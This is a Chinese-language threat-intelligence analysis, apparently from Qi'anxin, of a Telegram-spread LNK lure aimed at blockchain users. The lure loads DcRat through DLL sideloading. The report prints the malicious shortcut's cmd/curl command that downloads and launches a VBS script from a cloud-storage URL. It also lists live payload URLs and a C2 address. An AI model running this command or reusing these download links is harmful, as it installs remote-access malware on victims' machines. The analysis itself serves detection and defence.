仿冒奇安信证书！针对区块链客户的定向攻击活动

概述

奇安信威胁情报中心和天擎猎鹰团队在终端运营过程中发现一伙未知的攻击者正在瞄准区块链行业的客户，恶意的压缩包为“转账截图2025.5.31.zip”，攻击者通过 Telagram 通信软件一对一进行传播，压缩包中为 Lnk 诱饵，双击后弹转账记录截图和释放白加黑组件，内存加载 DcRat，C2 带有自签名证书模仿qianxin.com。

目前天擎“六合”高级威胁防御引擎已经可以实现对该 Lnk 的拦截，我们建议客户启用云查功能来发现未知威胁。

样本分析

Lnk 文件指向的命令如下：

Cmd

C:\\Windows\\System32\\cmd.exe /c "curl -o C:\\Users\\Public\\aa.vbs https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\\Users\\Public\\aa.vbs"

从远程服务器下载 vbs 脚本并启动，内容如下，带有中文注释，内容很像主流 GPT 自动生成的脚本代码：

下载链接	文件路径	文件描述
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5CF1D461CBF74FC4A2379ACCC8D45CA7.jpg	C:\\Users\\Public\\TokenPocket.jpg	诱饵图片
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/C16E6F8B5A614F74A597C3F055484754.txt	C:\\Users\\Public\\pythonw.exe	白文件，用于加载恶意DLL
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/2C36BCF9295640CFB21933AE822F5D75.res	C:\\Users\\Public\\python310.dll	黑DLL组件，具有白签名

诱饵文件如下：

释放的黑 dll 被加上了合法的数字签名 “Wuhoo Harmonious Reed Trade Co., Ltd.”

恶意代码逻辑在 Py_Main 函数中，主要功能为在内存中加载 Shellcode。

此 Shellcode 是一个 Loader，用于加载最终载荷 DCRat，C2：103.45.68.150:80

与 C2 建立连接后，启动 Powershell 下载第二阶段的 Payload：

下载链接	文件路径	文件描述
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/27391835C6744B469E35C90327E527C8.txt	C:\\Users\\Public\\arphaCrashReport64.exe	白文件，用于加载恶意DLL
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/B999853FC3464384A7E5E5B9B71147E5.res	C:\\Users\\Public\\arphadump64.dll	黑DLL组件
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/540B0BAA3C5641EC9BF220021A16D230.ini	C:\\Users\\Public\\arphaCrashReport64.ini	加密的shellcode
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/15AD296C703E4D648CA98FED712C6C49.jpg	C:\\Users\\Public\\photo_2024-12-07_00-24-16.jpg	诱饵图片